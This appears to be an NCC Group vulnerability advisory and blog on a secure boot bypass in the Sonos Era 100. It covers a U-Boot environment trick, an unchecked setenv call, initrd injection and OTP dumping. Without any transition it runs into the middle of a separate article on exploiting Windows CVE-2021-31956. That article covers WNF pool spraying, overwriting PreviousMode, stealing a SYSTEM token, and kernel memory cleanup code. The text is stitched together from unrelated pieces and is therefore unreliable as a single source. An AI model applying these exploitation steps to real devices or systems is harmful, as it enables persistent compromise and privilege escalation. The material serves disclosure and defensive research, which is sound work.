Vendor: Sonos
Vendor URL: https://www.sonos.com/
Versions affected:
* Confirmed 73.0-42060
Systems Affected: Sonos Era 100
Author: Ilya Zhuravlev
Advisory URL: Not provided by Sonos. Sonos state an update was released on 2023-11-15 which remediated the issue.
CVE Identifier: N/A
Risk: High
Summary
Sonos Era 100 is a smart speaker released in 2023. A vulnerability exists in the U-Boot component of the firmware which would allow for persistent arbitrary code execution with Linux kernel privileges. This vulnerability could be exploited either by an attacker with physical access to the device, or by obtaining write access to the flash memory through a separate runtime vulnerability.
Impact
An unsigned attacker-controlled rootfs may be loaded by the Linux kernel. This achieves a persistent bypass of the secure boot mechanism, providing early code execution within the Linux userspace under the /init process as the "root" user. It can be further escalated into kernel-mode arbitrary code execution by loading a custom kernel module.
Details
The implementation of the custom "sonosboot" command loads the kernel image, performs the signature check, and then passes execution to the built-in U-Boot "bootm" command. Since "bootm" uses the "bootargs" environment variable as Linux kernel arguments, the "sonosboot" command initializes it with a call to `setenv`:
setenv("bootargs",(char *)kernel_cmdline);
However, the return value of `setenv` is not checked. If this call fails, "bootargs" will keep its previous value and "bootm" will pass it to the Linux kernel.
On the Sonos Era 100 the U-Boot environment is loaded from the eMMC at address 0x500000. The factory image does not contain a valid U-Boot environment there, which is confirmed by the "*** Warning - bad CRC, using default environment" message displayed on UART. However, it is possible to place a valid environment there by writing directly to the eMMC with a hardware programmer.
There is a feature in U-Boot that allows setting environment variables as read-only. For example, setting "bootargs=something" and then ".flags=bootargs:sr" would make any future writes to "bootargs" fail. Thus, the Linux kernel will boot with an attacker-controlled "bootargs".
As a result, it is possible to fully control the Linux kernel command line. From there, an adversary could append the "initrd=0xADDR,0xSIZE" option to load their own initramfs, overriding the one embedded in the image.
By replacing the "/init" process it is then possible to obtain early persistent code execution on the device.
Recommendation
Consider setting CONFIG_ENV_IS_NOWHERE to disable loading of a U-Boot environment from the flash memory.
Validate the return value of setenv and abort the boot process if the call fails.
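The second recommendation can be illustrated with a minimal sketch. This is not the Sonos or U-Boot code: `struct env_var`, `mock_setenv` and `prepare_bootargs` are hypothetical names that model a single environment variable with a read-only flag, which is just enough to show a boot path that refuses to continue when the write is rejected.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for one U-Boot environment variable. */
struct env_var {
    char value[256];
    int  read_only;   /* models a variable locked via ".flags" */
};

/* Mock of setenv(): returns 0 on success, non-zero if the write is refused. */
static int mock_setenv(struct env_var *var, const char *value)
{
    assert(var != NULL && value != NULL);
    if (var->read_only)
        return 1;
    snprintf(var->value, sizeof(var->value), "%s", value);
    return 0;
}

/* Returns 0 if it is safe to continue to bootm, -1 if boot must be aborted. */
static int prepare_bootargs(struct env_var *bootargs, const char *kernel_cmdline)
{
    if (mock_setenv(bootargs, kernel_cmdline) != 0)
        return -1;   /* write refused: a stale value would reach the kernel */

    /* Defence in depth: confirm the variable really holds the trusted value. */
    if (strcmp(bootargs->value, kernel_cmdline) != 0)
        return -1;

    return 0;
}
```

With a read-only variable that was pre-seeded by an attacker, `prepare_bootargs` returns -1 and the caller can halt instead of booting with the stale command line.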
Vendor Communication
Date | Communication
2023-09-04 | Issue reported to vendor.
2023-09-07 | Sonos has triaged report and is investigating.
2023-11-29 | NCC queries Sonos for expected patch date.
2023-11-29 | Sonos informs NCC that they already shipped a patch on the 15th Nov.
2023-11-30 | NCC queries why there are no release notes, CVE, or credit for the issues.
2023-12-01 | NCC informs Sonos that technical details will be published the w/c 4th Dec.
Research performed by Ilya Zhuravlev supporting the Exploit
Development Group (EDG).
The Era 100 is Sonos's flagship device, released on March 28th 2023
and is a notable step up from the Sonos One. It was also one of the
target devices for Pwn2Own
Toronto 2023. NCC found multiple security weaknesses within the
bootloader of the device which could be exploited leading to root/kernel
code execution and full compromise of the device.
According to Sonos, the issues reported were patched in an update
released on the 15th of November with no CVE issued or public details of
the security weakness. NCC is not aware of the full scope of devices
impacted by this issue. Users of Sonos devices should ensure that they
apply any recent updates.
To develop an exploit eligible for the Pwn2Own contest, the first
step is to dump the firmware, gain initial access to the firmware, and
perhaps even set up debugging facilities to assist in debugging any
potential exploits.
In this article we will document the process of analyzing the
hardware, discovering several issues and developing a persistent secure
boot bypass for the Sonos Era 100.
Exploitation was also chained with a previously disclosed exploit
by bl4sty to obtain EL3 code
execution and obtain cryptographic key material.
Initial recon
After opening the device, we quickly identified UART pins broken out
on the motherboard:
The pinout is TX, RX, GND, Vcc
We can now attach a UART adapter and monitor the boot process:
SM1:BL:511f6b:81ca2f;FEAT:B0F02990:20283000;POC:F;RCY:0;EMMC:0;READ:0;0.0;0.0;CHK:0;
bl2_stage_init 0x01
bl2_stage_init 0xc1
bl2_stage_init 0x02
/* Skipped most of the log here */
U-Boot 2016.11-S767-Strict-Rev0.10 (Oct 13 2022 - 09:14:35 +0000)
SoC: Amlogic S767
Board: Sonos Optimo1 Revision 0x06
Reset: POR
cpu family id not support!!!
thermal ver flag error!
flagbuf is 0xfa!
read calibrated data failed
SOC Temperature -1 C
I2C: ready
DRAM: 1 GiB
initializing iomux_cfg_i2c
register usb cfg[0][1] = 000000007ffabde0
MMC: SDIO Port C: 0
*** Warning - bad CRC, using default environment
In: serial
Out: serial
Err: serial
Init Video as 1920 x 1080 pixel matrix
Net: dwmac.ff3f0000
checking cpuid allowlist (my cpuid is 2b:0b:17:00:01:17:12:00:00:11:33:38:36:55:4d:50)...
allowlist check completed
Hit any key to stop autoboot: 0
pending_unlock: no pending DevUnlock
Image header on sect 0
Magic: 536f7821
Version 1
Bootgen 0
Kernel Offset 40
Kernel Checksum 78c13f6f
Kernel Length a2ba18
Rootfs Offset 0
Rootfs Checksum 0
Rootfs Length 0
Rootfs Format 2
Image header on sect 1
Magic: 536f7821
Version 1
Bootgen 2
Kernel Offset 40
Kernel Checksum 78c13f6f
Kernel Length a2ba18
Rootfs Offset 0
Rootfs Checksum 0
Rootfs Length 0
Rootfs Format 2
Both headers OK, bootgens 0 2
uboot: section-1 selected
boot_state 0
364 byte kernel signature verified successfully
JTAG disabled
disable_usb: DISABLE_USB_BOOT fuse already set
disable_usb: DISABLE_JTAG fuse already set
disable_usb: DISABLE_M3_JTAG fuse already set
disable_usb: DISABLE_M4_JTAG fuse already set
srk_fuses: not revoking any more SRK keys (0x1)
srk_fuses: locking SRK revocation fuses
Start the watchdog timer before starting the kernel...
get_kernel_config [id = 1, rev = 6] returning 22
## Loading kernel from FIT Image at 00100040 ...
Using 'conf@23' configuration
Trying 'kernel@1' kernel subimage
Description: Sonos Linux kernel for S767
Type: Kernel Image
Compression: lz4 compressed
Data Start: 0x00100128
Data Size: 9076344 Bytes = 8.7 MiB
Architecture: AArch64
OS: Linux
Load Address: 0x01080000
Entry Point: 0x01080000
Hash algo: crc32
Hash value: 2e036fce
Verifying Hash Integrity ... crc32+ OK
## Loading fdt from FIT Image at 00100040 ...
Using 'conf@23' configuration
Trying 'fdt@23' fdt subimage
Description: Flattened Device Tree Sonos Optimo1 V6
Type: Flat Device Tree
Compression: uncompressed
Data Start: 0x00a27fe8
Data Size: 75487 Bytes = 73.7 KiB
Architecture: AArch64
Hash algo: crc32
Hash value: adbd3c21
Verifying Hash Integrity ... crc32+ OK
Booting using the fdt blob at 0xa27fe8
Uncompressing Kernel Image ... OK
Loading Device Tree to 00000000417ea000, end 00000000417ff6de ... OK
Starting kernel ...
vmin:32 b5 0 0!
From this log, we can see that the boot process is very similar to
other Sonos devices. Moreover, despite the marking on the SoC and the
boot log indicating an undocumented Amlogic S767a chip, the first line
of the BootROM log containing "SM1" points us to S905X3, which has a
datasheet available.
Whilst it's possible to interrupt the U-Boot boot process, Sonos has
gone through several rounds of boot hardening and by now the U-Boot
console is only accessible with a password that is stored hashed inside
the U-Boot binary. Additionally, the set of accessible U-Boot commands
is heavily restricted.
Dumping the eMMC
Continuing to probe the PCB, we next located the eMMC data pins in
order to attempt an in-circuit eMMC dump. From previous
generations of Sonos devices, we knew that the data on the flash is
mostly encrypted. Nevertheless, an in-circuit eMMC connection would also
allow us to rapidly modify the flash memory contents, without having to
take the chip off and put it back on every time.
By probing termination resistors and test points located in the
general area between the SoC and the eMMC chip, first with an
oscilloscope and then with a logic analyzer, it was possible to identify
several candidates for eMMC lines.
To perform an in-circuit dump, we have to connect CLK, CMD, DAT0 and
ground at a minimum. While CLK and CMD are pretty obvious from the
above capture, there are multiple candidates for the DAT0 pin. Moreover,
we could only identify 3 out of 4 data pins at this point. Fortunately,
after trying all 3 of these, it was possible to identify the following
connections:
Note that the extra pin marked as "INT" here is used to interrupt the
BootROM boot process. By connecting it to ground during boot, the
BootROM gets stuck trying to boot from SPINOR, which allows us to
communicate on the eMMC lines without interference.
From there, it was possible to dump the contents of eMMC and confirm
that the bulk of the firmware including the Linux rootfs was
encrypted.
Investigating U-Boot
While we were unable to get access to the Sonos Era 100 U-Boot binary
just yet, previous work on Sonos devices enabled us to obtain a
plaintext binary for the Sonos One U-Boot. At this point we were hoping
that the images would be mostly the same, and that a vulnerability
existed in U-Boot that could be exploited in a black-box manner
utilizing the eMMC read-write capability.
Several such issues were identified and are documented below.
Issue 1: Stored environment
Despite the device not utilizing the stored environment feature of
U-Boot, there's still an attempt to load the environment from flash at
startup. This appears to stem from a misconfiguration where the
CONFIG_ENV_IS_NOWHERE flag is not set in U-Boot. As a
result, during startup it will try to load the environment from flash
offset 0x500000. Since there's no valid environment there,
it displays the following warning message over UART:
*** Warning - bad CRC, using default environment
The message goes away when a valid environment is written to that
location. This enables us to set variables such as bootcmd,
essentially bypassing the password-protected Sonos U-Boot console.
However, as mentioned above, the available commands are heavily
restricted.
Issue 2: Unchecked setenv() call
By default on the Sonos Era 100, U-Boot's "bootcmd" is set to
"sonosboot". To understand the overall boot process, it was possible to
reverse engineer the custom "sonosboot" handler. On a high level, this
command is responsible for loading and validating the kernel image after
which it passes control to the U-Boot "bootm" built-in. Because "bootm"
uses U-Boot environment variables to control the arguments passed to the
Linux kernel, "sonosboot" makes sure to set them up first before passing
control:
setenv("bootargs",(char*)kernel_cmdline);
There is however no check on the return value of this
setenv call. If it fails, the variable will keep its
previous value, which in our case is the value loaded from the stored
environment.
As it turns out, it is possible to make this setenv call
fail. A somewhat obscure feature of U-Boot allows marking
variables as read-only. For example, by setting
".flags=bootargs:sr", the "bootargs" variable becomes read-only and all
future writes without the H_FORCE flag fail.
All we have to do at this point to exploit this issue is to construct
a stored environment that first defines the "bootargs" value, and then
sets it as read-only by defining ".flags=bootargs:sr". The execution of
"sonosboot" will then proceed into "bootm" and it will start the Linux
kernel with fully controlled command-line arguments.
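Constructing such an environment can be sketched as follows. The layout used here is the common non-redundant U-Boot format (a 4-byte CRC32 followed by NUL-terminated "key=value" strings, an extra terminating NUL, and padding), with the CRC computed over the whole data area. The environment size configured on the Era 100 is not stated in this article, so `env_size` is a caller-supplied assumption, and `crc32_calc` and `build_env_image` are hypothetical helper names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Standard reflected CRC-32 (polynomial 0xEDB88320), bit-by-bit variant. */
static uint32_t crc32_calc(const uint8_t *data, size_t len)
{
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < len; i++) {
        crc ^= data[i];
        for (int bit = 0; bit < 8; bit++)
            crc = (crc & 1u) ? (crc >> 1) ^ 0xEDB88320u : crc >> 1;
    }
    return ~crc;
}

/*
 * Builds an environment image of env_size bytes in out:
 *   [0..3]  little-endian CRC32 of the data area
 *   [4..]   "key=value\0" entries, a final '\0', then zero padding
 * Returns 0 on success, -1 if the entries do not fit.
 */
static int build_env_image(uint8_t *out, size_t env_size,
                           const char *const *entries, size_t count)
{
    assert(out != NULL && entries != NULL);
    if (env_size < 6)
        return -1;

    uint8_t *data = out + 4;
    size_t data_size = env_size - 4;
    size_t pos = 0;

    memset(out, 0, env_size);
    for (size_t i = 0; i < count; i++) {
        size_t n = strlen(entries[i]) + 1;      /* include the NUL */
        if (pos + n + 1 > data_size)            /* keep room for the final NUL */
            return -1;
        memcpy(data + pos, entries[i], n);
        pos += n;
    }

    uint32_t crc = crc32_calc(data, data_size);
    out[0] = (uint8_t)(crc & 0xFFu);
    out[1] = (uint8_t)((crc >> 8) & 0xFFu);
    out[2] = (uint8_t)((crc >> 16) & 0xFFu);
    out[3] = (uint8_t)((crc >> 24) & 0xFFu);
    return 0;
}
```

Passing the two entries "bootargs=..." and ".flags=bootargs:sr" in that order yields an image that could then be written to the environment offset; the exact "bootargs" contents depend on the target and are not given here.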
One way to obtain code execution from there is to insert an
"initrd=0xADDR,0xSIZE" argument which will cause the Linux kernel to
load an initramfs from memory at the specified address, overriding the
built-in image.
Issue 3: Malleable firmware image
The exploitation process described above, however, requires that
controlled data is placed at a known static address. One way we
found to do that is to abuse the custom Sonos
image header. According to U-Boot logs, the image is always loaded at
address 0x100000:
## Loading kernel from FIT Image at 00100040 ...
Using 'conf@23' configuration
Trying 'kernel@1' kernel subimage
Description: Sonos Linux kernel for S767
Type: Kernel Image
Compression: lz4 compressed
Data Start: 0x00100128
Data Size: 9076344 Bytes = 8.7 MiB
Architecture: AArch64
OS: Linux
Load Address: 0x01080000
Entry Point: 0x01080000
Hash algo: crc32
Hash value: 2e036fce
Verifying Hash Integrity ... crc32+ OK
The image header can be represented in pseudocode as follows:
The issue is that while the value of kernel_offset is
normally 0x40, it is not enforced by U-Boot. By setting the offset to a
higher value and then filling the empty space with arbitrary data, we
can place the data at a known fixed location in U-Boot memory while
ensuring that the signature check on the image still passes.
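The arithmetic behind this can be sketched as below. The load address 0x100000 and the usual offset 0x40 come from the boot log; treating the region between 0x100040 and the relocated kernel as the attacker-controlled padding assumes the header occupies exactly 0x40 bytes. `padding_range` and `kernel_offset_is_valid` are hypothetical names, the latter showing the kind of strict check that would close the gap.

```c
#include <assert.h>
#include <stdint.h>

#define IMAGE_LOAD_ADDR        0x100000u  /* from the U-Boot log */
#define EXPECTED_KERNEL_OFFSET 0x40u      /* normal value of kernel_offset */

struct mem_range {
    uint32_t start;  /* first byte of the padding in U-Boot memory */
    uint32_t size;   /* number of padding bytes before the kernel */
};

/* A strict loader would only accept the expected offset. */
static int kernel_offset_is_valid(uint32_t kernel_offset)
{
    return kernel_offset == EXPECTED_KERNEL_OFFSET;
}

/* Where arbitrary data ends up when kernel_offset is pushed further out. */
static struct mem_range padding_range(uint32_t kernel_offset)
{
    assert(kernel_offset >= EXPECTED_KERNEL_OFFSET);
    struct mem_range r;
    r.start = IMAGE_LOAD_ADDR + EXPECTED_KERNEL_OFFSET;
    r.size  = kernel_offset - EXPECTED_KERNEL_OFFSET;
    return r;
}
```

For example, an offset of 0x1040 would leave 0x1000 bytes of padding starting at 0x100040, which is the kind of address and size an "initrd=" argument could point at.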
Combining all three issues outlined above, it is possible to achieve
persistent code execution within Linux under the /init process as the
"root" user.
Moreover, by inserting a kernel module this access can be escalated
to kernel-mode arbitrary code execution.
Epilogue
There's just one missing piece and that is to dump the one-time
programmable (OTP) data so that we can decrypt any future firmware.
Fortunately, the factory firmware that the device came pre-flashed with
does not contain a fix for the vulnerability disclosed in
https://haxx.in/posts/dumping-the-amlogic-a113x-bootrom/
From there, slight modifications are required to adjust the exploit
for the different EL3 binary of this device. The arbitrary read
primitive provided by the a113x-el3-pwn tool works as-is
and allows for the EL3 image to be dumped. With the adjusted exploit we
were then able to dump full OTP contents and decrypt any future firmware
update for this device.
Disclosure Timeline
Date | Action
2023-09-04 | NCC reports issues to Sonos
2023-09-07 | Sonos has triaged report and is investigating
2023-11-29 | NCC queries Sonos for expected patch date
2023-11-29 | Sonos informs NCC that they already shipped a patch on the 15th Nov
2023-11-30 | NCC queries why no release notes, CVE or credit for the issues
2023-12-01 | NCC informs Sonos that technical details will be published the w/c 4th Dec
* An overview of the vulnerability assigned CVE-2021-31956 (NTFS Paged Pool Memory corruption) and how to trigger it
* An introduction into the Windows Notification Framework (WNF) from an exploitation perspective
* Exploit primitives which can be built using WNF
In this article I aim to build on that previous knowledge and cover the following areas:
* Exploitation without the CVE-2021-31955 information disclosure
* Enabling better exploit primitives through PreviousMode
* Reliability, stability and exploit clean-up
* Thoughts on detection
The version targeted within this blog was Windows 10 20H2 (OS Build 19042.508). However, this approach has been tested on all Windows versions post 19H1 when the segment pool was introduced.
Exploitation without CVE-2021-31955 information disclosure
I hinted in the previous blog post that this vulnerability could likely be exploited without the usage of the separate EPROCESS address leak vulnerability (CVE-2021-31955). This was also realised by Yan ZiShuang and documented within their blog post.
Typically, for Windows local privilege escalation, once an attacker has achieved arbitrary write or kernel code execution then the aim will be to escalate privileges for their associated userland process or spawn a privileged command shell. Windows processes have an associated kernel structure called _EPROCESS which acts as the process object for that process. Within this structure, there is a Token member which represents the process's security context and contains things such as the token privileges, token types, session id etc.
CVE-2021-31955 led to an information disclosure of the address of the _EPROCESS for each running process on the system and was understood to be used by the in-the-wild attacks found by Kaspersky. However, in practice for exploitation of CVE-2021-31956 this separate vulnerability is not needed.
This is due to the _EPROCESS pointer being contained within the _WNF_NAME_INSTANCE as the CreatorProcess member:
Therefore, provided that it is possible to get a relative read/write primitive using a _WNF_STATE_DATA to be able to read and write to a subsequent _WNF_NAME_INSTANCE, we can then overwrite the StateData pointer to point at an arbitrary location and also read the CreatorProcess address to obtain the address of the _EPROCESS structure within memory.
The initial pool layout we are aiming for is as follows:
The difficulty is that low fragmentation heap (LFH) randomisation makes it harder to achieve this memory layout reliably. Iteration one of this exploit stayed away from the approach until more research had been performed into improving the general reliability and reducing the chances of a BSOD.
As an example, under normal scenarios you might end up with the following allocation pattern for a number of sequentially allocated blocks:
In the absence of an LFH "Heap Randomisation" weakness or vulnerability, this post explains how it is possible to achieve a "reasonably" high level of exploitation success and what cleanups need to occur in order to maintain system stability post exploitation.
Stage 1: The Spray and Overflow
Starting from where we left off in the first article, we need to go back and rework the spray and overflow.
Firstly, our _WNF_NAME_INSTANCE is 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. As mentioned previously this gets put into a chunk of size 0xC0.
We also need to spray _WNF_STATE_DATA objects with a data size of 0xA0, which, when added to the _WNF_STATE_DATA header (0x10) and the POOL_HEADER (0x10), also results in an allocated chunk of 0xC0.
As mentioned within part 1 of the article, since we can control the size of the vulnerable allocation we can also ensure that our overflowing NTFS extended attribute chunk is also allocated within the 0xC0 segment.
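The size arithmetic above can be checked with a small sketch. It assumes the 0x10-byte allocation granularity of the x64 kernel pool; `pool_chunk_size` and the macro names are hypothetical and only mirror the numbers quoted in the text.

```c
#include <assert.h>
#include <stddef.h>

#define POOL_HEADER_SIZE            0x10u
#define POOL_GRANULARITY            0x10u  /* assumed x64 pool alignment */
#define WNF_STATE_DATA_HEADER_SIZE  0x10u

/* Rounds (object + POOL_HEADER) up to the next multiple of the granularity. */
static size_t pool_chunk_size(size_t object_size)
{
    assert(object_size > 0);
    size_t total = object_size + POOL_HEADER_SIZE;
    return (total + POOL_GRANULARITY - 1) & ~(size_t)(POOL_GRANULARITY - 1);
}
```

Here `pool_chunk_size(0xA8)` gives 0xC0 for the _WNF_NAME_INSTANCE, and `pool_chunk_size(WNF_STATE_DATA_HEADER_SIZE + 0xA0)` gives 0xC0 for the sprayed _WNF_STATE_DATA, so both land in the same bucket.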
However, because we cannot deterministically know which object will be adjacent to our vulnerable NTFS chunk (as mentioned above), we cannot take a similar approach to the past article of freeing objects and then reusing the resulting holes. Both the _WNF_STATE_DATA and _WNF_NAME_INSTANCE objects are allocated at the same time, and we need both present within the same pool segment.
Therefore, we need to be very careful with the overflow. We make sure that only the following fields are overflowed by 0x10 bytes (and the POOL_HEADER).
In the case of a corrupted _WNF_NAME_INSTANCE, both the Header and RunRef members will be overflowed:
As we don't know if we are going to overflow a _WNF_NAME_INSTANCE or a _WNF_STATE_DATA first, we can trigger the overflow and check for corruption by looping through and querying each _WNF_STATE_DATA using NtQueryWnfStateData.
If we detect corruption, then we know we have identified our _WNF_STATE_DATA object. If not, then we can repeatedly trigger the spray and overflow until we have obtained a _WNF_STATE_DATA object which allows a read/write across the pool subsegment.
There are a few problems with this approach, some of which can be addressed and some for which there is no perfect solution:
1) We only want to corrupt _WNF_STATE_DATA objects but the pool segment also contains _WNF_NAME_INSTANCE objects due to needing to be the same size. Using only a 0x10 data size overflow and cleaning up afterwards (as described in the Kernel Memory Cleanup section) means that this issue does not cause a problem.
2) Occasionally our unbounded _WNF_STATE_DATA containing chunk can be allocated within the final block within the pool segment. This means that when querying with NtQueryWnfStateData an unmapped memory read will occur off the end of the page. This rarely happens in practice and increasing the spray size reduces the likelihood of this occurring (see Exploit Testing and Statistics section).
3) Other operating system functionality may make an allocation within the 0xC0 pool segment and lead to corruption and instability. By performing a large spray before triggering the overflow, from practical testing, this seems to rarely happen within the test environment.
I think it's useful to document these challenges with modern memory corruption exploitation techniques where it's not always possible to gain 100% reliability.
Overall, with 1) remediated and 2) and 3) only occurring very rarely, in lieu of a perfect solution we can move to the next stage.
Stage 2: Locating a _WNF_NAME_INSTANCE and overwriting the StateData pointer
Once we have unbounded our _WNF_STATE_DATA by overflowing the DataSize and AllocatedSize as described above, and within the first blog post, we can then use the relative read to locate an adjacent _WNF_NAME_INSTANCE.
By scanning through the memory we can locate the pattern "\x03\x09\xa8" which denotes the start of a _WNF_NAME_INSTANCE and from this obtain the interesting member variables.
The CreatorProcess, StateName, StateData, ScopeInstance can be disclosed from the identified target object.
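The scan itself can be sketched as a simple byte search over the buffer returned by the relative read. `find_name_instance` is a hypothetical helper; a real exploit would probably also check alignment and validate the fields that follow the header before trusting a match.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* First three bytes of the _WNF_NAME_INSTANCE header as they appear in memory. */
static const uint8_t NAME_INSTANCE_MAGIC[3] = { 0x03, 0x09, 0xA8 };

/* Returns the offset of the first match in buf, or -1 if the pattern is absent. */
static ptrdiff_t find_name_instance(const uint8_t *buf, size_t len)
{
    assert(buf != NULL);
    if (len < sizeof(NAME_INSTANCE_MAGIC))
        return -1;

    for (size_t off = 0; off + sizeof(NAME_INSTANCE_MAGIC) <= len; off++) {
        if (memcmp(buf + off, NAME_INSTANCE_MAGIC, sizeof(NAME_INSTANCE_MAGIC)) == 0)
            return (ptrdiff_t)off;
    }
    return -1;
}
```

The returned offset is relative to the start of the leaked data, so the member offsets of the _WNF_NAME_INSTANCE are added to it to pull out the CreatorProcess, StateName, StateData and ScopeInstance values.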
We can then use the relative write to replace the StateData pointer with an arbitrary location which is desired for our read and write primitive. For example, an offset within the _EPROCESS structure based on the address which has been obtained from CreatorProcess.
Care needs to be taken here to ensure that the new location StateData points at overlaps with sane values for the AllocatedSize, DataSize values preceding the data wishing to be read or written.
In this case the aim was to achieve a full arbitrary read and write but without having the constraints of needing to find sane and reliable AllocatedSize and DataSize values prior to the memory which it was desired to write to.
Our overall goal was to target the KTHREAD structure's PreviousMode member and then make use of the APIs NtReadVirtualMemory and NtWriteVirtualMemory to enable a more flexible arbitrary read and write.
It helps to have a good understanding of how these kernel memory structures are used to understand how this works. In a massively simplified overview, the kernel mode portion of Windows contains a number of subsystems: the hardware abstraction layer (HAL), the executive subsystems and the kernel. _EPROCESS is part of the executive layer which deals with general OS policy and operations. The kernel subsystem handles architecture specific details for low level operations and the HAL provides an abstraction layer to deal with differences between hardware.
Processes and threads are represented at both the executive and kernel "layer" within kernel memory as _EPROCESS and _KPROCESS and _ETHREAD and _KTHREAD structures respectively.
The documentation on PreviousMode states "When a user-mode application calls the Nt or Zw version of a native system services routine, the system call mechanism traps the calling thread to kernel mode. To indicate that the parameter values originated in user mode, the trap handler for the system call sets the PreviousMode field in the thread object of the caller to UserMode. The native system services routine checks the PreviousMode field of the calling thread to determine whether the parameters are from a user-mode source."
Looking at MiReadWriteVirtualMemory, which is called from NtWriteVirtualMemory, we can see that if PreviousMode is not set when a user-mode thread executes, then the address validation is skipped and kernel memory space addresses can be written to:
This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM.
So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.
From this we can calculate the base address of the _KTHREAD using the offset of 0x2F8 i.e. the ThreadListEntry offset.
0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080
We can check this is correct (and see we hit our breakpoint in the previous article):
Once we have set the StateData pointer of the _WNF_NAME_INSTANCE to point just before the _KPROCESS ThreadListHead Flink, we can leak out the value by confusing it with the DataSize and the ChangeTimestamp. After querying the object, we can then calculate the FLINK as `FLINK = (uintptr_t)ChangeTimestamp << 32 | DataSize`.
This allows us to calculate the _KTHREAD address using FLINK - 0x2f8.
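As a worked example of this pointer arithmetic, the sketch below recombines the two leaked 32-bit values and applies the offsets quoted in the text (0x2F8 for ThreadListEntry and 0x232 for PreviousMode, both specific to the Windows build tested). The function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define THREAD_LIST_ENTRY_OFFSET 0x2F8u  /* _KTHREAD.ThreadListEntry on the tested build */
#define PREVIOUS_MODE_OFFSET     0x232u  /* _KTHREAD.PreviousMode on the tested build */

/* Rebuilds the 64-bit Flink from the values read back as DataSize and ChangeTimestamp. */
static uint64_t flink_from_leak(uint32_t data_size, uint32_t change_timestamp)
{
    return ((uint64_t)change_timestamp << 32) | data_size;
}

/* The Flink points at ThreadListEntry inside the _KTHREAD, so step back to its base. */
static uint64_t kthread_from_flink(uint64_t flink)
{
    assert(flink >= THREAD_LIST_ENTRY_OFFSET);
    return flink - THREAD_LIST_ENTRY_OFFSET;
}

/* Address of the PreviousMode byte within that _KTHREAD. */
static uint64_t previous_mode_address(uint64_t kthread)
{
    return kthread + PREVIOUS_MODE_OFFSET;
}
```

Using the address from the earlier calculation, a DataSize of 0x06a54378 and a ChangeTimestamp of 0xffffd186 recombine to 0xffffd18606a54378, which gives a _KTHREAD base of 0xffffd18606a54080.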
Once we have the address of the _KTHREAD we need to again find a sane value to confuse with the AllocatedSize and DataSize to allow reading and writing of PreviousMode value at offset 0x232.
This allows the most significant word of the Process pointer shown above to be used as the AllocatedSize and the UserAffinity to act as the DataSize. Incidentally, we can actually influence the value used for DataSize using SetProcessAffinityMask or by launching the process with start /affinity exploit.exe, but for our purposes of being able to read and write PreviousMode this is fine.
Visually this looks as follows after the StateData has been modified:
This gives a 3 byte read (and up to 0xffff900f bytes of write if needed, although we only need 3 bytes), which includes PreviousMode (i.e. set to 1 before modification):
00 00 01 00 00 00 00 00 00 00 | ..........
Because the pointer is always a kernel-mode address, using its most significant word should ensure that the AllocatedSize is sufficient to enable overwriting PreviousMode.
Post Exploitation
Once we have set PreviousMode to 0, as mentioned above, this now gives an unconstrained read/write across the whole kernel memory space using NtWriteVirtualMemory and NtReadVirtualMemory. This is a very powerful method and demonstrates how moving from an awkward-to-use arbitrary read/write to a better method enables easier post exploitation and enhanced clean-up options.
It is then trivial to walk the ActiveProcessLinks within the EPROCESS, obtain a pointer to a SYSTEM token and replace the existing token with this or to perform escalation by overwriting the _SEP_TOKEN_PRIVILEGES for the existing token using techniques which have been long used by Windows exploits.
Kernel Memory Cleanup
OK, so the above is good enough for a proof of concept exploit, but due to the potentially large number of memory writes needed for exploit success, it could leave the kernel in a bad state. Also, when the process terminates, certain memory locations which have been overwritten could trigger a BSOD when that corrupted memory is used.
This part of the exploitation process is often overlooked by proof of concept exploit writers but is often the most challenging for use in real world scenarios (red teams / simulated attacks etc.) where stability and reliability are important. Going through this process also helps understand how these types of attacks can be detected.
This section of the blog describes some improvements which can be made in this area.
PreviousMode Restoration
On the version of Windows tested, if we try to launch a new process as SYSTEM while PreviousMode is still set to 0, we end up with the following crash:
More research needs to be performed to determine if this is necessary on prior versions or if this was a recently introduced change.
This can be fixed simply by using our NtWriteVirtualMemory APIs to restore the PreviousMode value to 1 before launching the cmd.exe shell.
StateData Pointer Restoration
The _WNF_STATE_DATA StateData pointer is freed when the _WNF_NAME_INSTANCE is freed on process termination (incidentally also an arbitrary free). If this is not restored to the original value, we will end up with a crash as follows:
Although we could restore this using the WNF relative read/write, as we have arbitrary read and write using the APIs, we can implement a function which uses a previously saved ScopeInstance pointer to search for the StateName of our targeted _WNF_NAME_INSTANCE object address.
Visually this looks as follows:
Some example code for this is:
/**
* This function returns back the address of a _WNF_NAME_INSTANCE looked up by its internal StateName
* It performs an _RTL_AVL_TREE tree walk against the sorted tree of _WNF_NAME_INSTANCES.
* The tree root is at _WNF_SCOPE_INSTANCE+0x38 (NameSet)
**/
QWORD* FindStateName(unsigned __int64 StateName)
{
    QWORD* i;

    // _WNF_SCOPE_INSTANCE+0x38 (NameSet)
    for (i = (QWORD*)read64((char*)BackupScopeInstance + 0x38); ; i = (QWORD*)read64((char*)i + 0x8))
    {
        while (1)
        {
            if (!i)
                return 0;

            // StateName is 0x18 after the TreeLinks FLINK
            QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);
            if (StateName >= CurrStateName)
                break;

            i = (QWORD*)read64(i);
        }
        QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);
        if (StateName <= CurrStateName)
            break;
    }
    return (QWORD*)((QWORD*)i - 2);
}
Then once we have obtained our _WNF_NAME_INSTANCE we can then restore the original StateData pointer.
RunRef Restoration
The next crash encountered was related to the fact that we may have corrupted the RunRef of many _WNF_NAME_INSTANCEs in the process of obtaining our unbounded _WNF_STATE_DATA. When ExReleaseRundownProtection is called and an invalid value is present, we will crash as follows:
To restore these correctly we need to think about how these objects fit together in memory and how to obtain a full list of all _WNF_NAME_INSTANCES which could possibly be corrupt.
Within _EPROCESS we have a member WnfContext which is a pointer to a _WNF_PROCESS_CONTEXT.
